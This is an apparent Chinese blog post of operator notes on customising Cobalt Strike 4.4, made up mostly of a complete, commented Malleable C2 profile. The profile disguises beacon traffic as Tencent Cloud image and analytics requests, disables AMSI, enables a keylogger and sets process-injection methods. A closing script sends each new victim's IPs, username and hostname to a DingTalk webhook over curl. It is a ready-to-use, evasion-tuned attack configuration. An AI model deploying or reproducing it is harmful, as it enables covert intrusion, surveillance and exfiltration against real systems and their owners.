CS4.4二开记录(二)

## Cobalt Strike Malleable C2 Profile## Version: Cobalt Strike 4.4## Date   : 2022-09-08 14:18:48
## Profile Name## set sample_name "CobaltStrike Beacon";
## Sleep Timesset sleeptime "47000"; # 心跳超时回连的时间set jitter    "18"; # 心跳回连抖动，防止规律性导致被标记set data_jitter "107"; # 返回数据抖动
## Beacon User-Agentset useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582";
## Self-signed SSL Certificates with SSL Beacon## Stager https-certificate {     set C   "AW";    set CN  "www.bing.com";    set O   "bing.com";    set OU  "bing.com";    set validity "365";}# 设置https证书，当然不推荐用这个，可以去cloudflare或者其他的申请个免费的ssl证书然后配置下，实例如下# https-certificate {#    set keystore "cobaltstrike.store";#    set password "0987654321";# }
## TCP Beaconset tcp_port "27898"; # TCP默认端口set tcp_frame_header "\x80"; # 在TCP信息前追加特定字符
## SMB beaconsset pipename         "mojo.5688.8052.183894939787088877## "; # 命名管道set pipename_stager  "mojo.5688.8052.35780273329370473## "; # 命名管道set smb_frame_header "\x80"; # 在SMB信息前追加特定字符
## DNS beaconsdns-beacon {    # Options moved into "dns-beacon" group in version 4.3    set maxdns          "252"; # 通过DNS上传数据时，最大主机名长度    set dns_max_txt     "248"; # txt最大传输长度    set dns_idle        "223.6.6.6";  # Beacon不使用时指定到的dns地址，降低风险性    set dns_sleep       "0"; # 每个单独dns请求前强制睡眠时间    set dns_stager_prepend "v=spf1 a:mail.google.com -all";  # 将字符串放在通过DNS TXT记录交付的编码有效负载阶段之前    set dns_stager_subhost ".vpn.123456.";  # dns txt记录使用的子域    set dns_ttl            "5"; # dns解析在服务器留存时间
    # DNS subhosts override options, added in version 4.3    set beacon           "a.bc.";    set get_A            "b.1a.";    set get_AAAA         "c.4a.";    set get_TXT          "d.tx.";    set put_metadata     "e.md.";    set put_output       "f.po.";    set ns_response      "zero";
}

## SSH beaconsset ssh_banner        "OpenSSH_7.4 Debian (protocol 2.0)"; # 配置SSH Beacon的bannerset ssh_pipename      "wkssvc## "; # 配置ssh通信命名管道
# code-signer { # 代码签名，有的话可以用#    set keystore "keystore.jks";#    set password "123456";#    set alias    "google";# }再看下http/https相关的，分阶段的beacon请求时的配置以及心跳包、任务包
## Staging processset host_stage "true";http-stager {    set uri_x86 "/qcloud/portal/kit/images/message-hover.93a6b104.svg"; # x86下载url    set uri_x64 "/_/qcloud/portal/kit/images/message-hover.93a6b104.svg"; # X64下载url    server { # 服务端响应配置        header "Content-Type" "image/svg+xml";        header "Server" "tencent-cos";        header "Timing-Allow-Origin" "https://cloud.tencent.com";        header "Access-Control-Expose-Headers" "Content-Length, Content-Type, server_ip, x-nws-log-uuid";                output {            prepend "<?xml version=\"1.0\" encoding=\"UTF-8\"?>; # 前置字符串            append "</svg>";  # 结尾字符串            print;        }    }    client { # 客户端请求配置        header "Accept" "image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8";        header "Accept-Language" "en-US,en;q=0.5";        header "Accept-Encoding" "gzip, deflate";    }}## HTTP Headershttp-config {    set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";    header "Server" "Apache";    header "Keep-Alive" "timeout=10, max=100";    header "Connection" "Keep-Alive";    # Use this option if your teamserver is behind a redirector    set trust_x_forwarded_for "true";    set block_useragents "curl*,lynx*,wget*";}## HTTP GEThttp-get {    set uri "/qcloud/portal/kit/images/message.ab26a8d5.svg";    set verb "GET";    client {        header "Accept-Encoding" "gzip, deflate";        header "Accept" "image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8";        header "Referer" "https://cloud.tencent.com/";        # header "Host" "cloudcache.tencent-cloud.com";        metadata {            base64url;            prepend "__Secure-3PAPISID=noskin;";            append ";CONSENT=YES+CN.zh-CN+20210917-09-0";            header "Cookie";        }    }    server {        header "Server" "tencent-cos";        header "Content-Type" "image/svg+xml";        header "X-Cos-Hash-Crc64ecma" "6783424209691934618";        header "Accept-Ranges" "bytes";        header "Timing-Allow-Origin" "https://cloud.tencent.com";        header "Last-Modified" "Tue, 12 Jul 2022 02:49:01 GMT";        output {            base64url;            prepend "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";            append "</g></svg>";            print;        }    }}## HTTP POSThttp-post {    set uri "/analytics/v2_upload";    set verb "POST";    client {        header "Content-Type" "application/json;charset=utf-8";        header "Origin" "https://cloud.tencent.com";        header "Accept" "application/json, text/plain, */*";        header "Referer" "https://cloud.tencent.com/";        # header "Host" "otheve.beacon.qq.com";        id {            base64url;            parameter "__formid";        }        parameter "location" "12345654321";        output {            base64url;            prepend "accver=1&showtype=embed&ua=";            print;        }    }    server {        header "Server" "Apache";        header "Content-Type" "text/plain";        header "Access-Control-Max-Age" "600";        header "Access-Control-Allow-Methods" "POST";        output {            prepend "{\"result\": 200, \"srcGatewayIp\": ";            append "1662617798236\", \"msg\": \"success\"}";            print;        }    }}

post-ex { # 派生的进程名、进程位置    set spawnto_x86 "%windir%\\syswow64\\spoolsv.exe";    set spawnto_x64 "%windir%\\sysnative\\spoolsv.exe";    set obfuscate "true"; # 混淆post-ex dll的内容    set smartinject "true";    set amsi_disable "true"; # 限制反恶意软件扫描接口    set pipename "netlogon_## "; # 进程管道名    set keylogger "GetAsyncKeyState"; # 选项用来控制Cobalt Strike的键盘记录器使用的函数}
process-inject { # 进程注入    set allocator "NtMapViewOfSection"; # 注入方式    set min_alloc "17500"; # 申请内存大小    set startrwx "false"; # 初始化权限    set userwx   "false"; # 最终权限    transform-x86 {        prepend "\x90\x90";    }    transform-x64 {        prepend "\x90\x90";        append "\x90\x90";    }    execute {        # The order is important! Each step will be attempted (if applicable) until successful        ## self-injection        CreateThread "ntdll!RtlUserThreadStart+0x42";        CreateThread;        ## Injection via suspened processes (SetThreadContext|NtQueueApcThread-s)        # SetThreadContext;        NtQueueApcThread-s;        # CreateRemotThread - Vanilla cross process injection technique. Doesn't cross session boundaries        CreateRemoteThread;        # RtlCreateUserThread - Supports all architecture dependent corner cases (e.g., 32bit -> 64bit injection) AND injection across session boundaries        RtlCreateUserThread;    }}

# 上线提醒on beacon_initial {        $DingDing_Robot_Token = 'aaaaaa';    $DingDing_Robot_Url = 'https://oapi.dingtalk.com/robot/send?access_token='.$DingDing_Robot_Token;    $Notice_Title = 'CobaltStrike 上线了!!!';        # 获取内外ip、计算机名、登录账号    $externalIP = replace(beacon_info($1, "external"), " ", "_");    $internalIP = replace(beacon_info($1, "internal"), " ", "_");    $userName = replace(beacon_info($1, "user"), " ", "_");    $computerName = replace(beacon_info($1, "computer"), " ", "_");    $processName = replace(beacon_info($1, "process"), " ", "_");    $processId = replace(beacon_info($1, "pid"), " ", "_");    $listenerName = replace(beacon_info($1, "listener"), " ", "_");
    $cip = "cip.cc/$externalIP";    $cip1 = exec("curl -s $cip");    $nowtime = exec("date +%m月%d日%H时%M分%S秒");    $aaa = '';    while $read (readln($cip1))    {        $aaa = "$aaa".'\n\n'."$read";    }    $Info = '# '.$Notice_Title.'\n\n外网IP:'.$externalIP.'\n\n内网IP:'.$internalIP.'\n\n用户名:'.$userName.'\n\n计算机名:'.$computerName.'\n\n进程名:'.$processName.'\n\n进程ID:'.$processId.'\n\n上线时间:'.readln($nowtime).'\n\n监听器:'.$listenerName.'\n\n------------------------\n\n## 外网IP来源参考'.$aaa;        @curl_command = @('curl','-H','Content-Type: application/json','-d','{"msgtype": "markdown","markdown": {"title":"'.$Notice_Title.'","text": "'.$Info.'"}}',$DingDing_Robot_Url);    exec(@curl_command);   }